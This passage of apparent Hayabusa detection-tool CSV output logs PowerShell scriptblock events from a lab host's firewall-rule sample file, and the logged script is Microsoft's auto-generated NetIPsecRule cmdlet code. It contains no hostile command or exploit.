(@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) 
$__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) 
$__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if 
($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName ))",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System 
Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"{ $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { 
$__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecRule' -Alias '*' function Set-NetIPsecRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode] ${Mode}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('SecIn')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${InboundSecurity}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('SecOut')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${OutboundSecurity}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule] ${KeyModule}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${AllowWatchKey}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${AllowSetKey}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalTunnelEndpoint}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteTunnelEndpoint}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${RequireAuthorization}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${User}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] 
${Machine}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Protocol}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"{ $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 
'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecRule' -Alias '*' function Set-NetIPsecRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] 
[OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject 
(cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode] ${Mode}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('SecIn')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${InboundSecurity}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('SecOut')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${OutboundSecurity}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] 
[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule] ${KeyModule}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${AllowWatchKey}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${AllowSetKey}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalTunnelEndpoint}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteTunnelEndpoint}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] 
[Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${RequireAuthorization}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${User}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Machine}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, 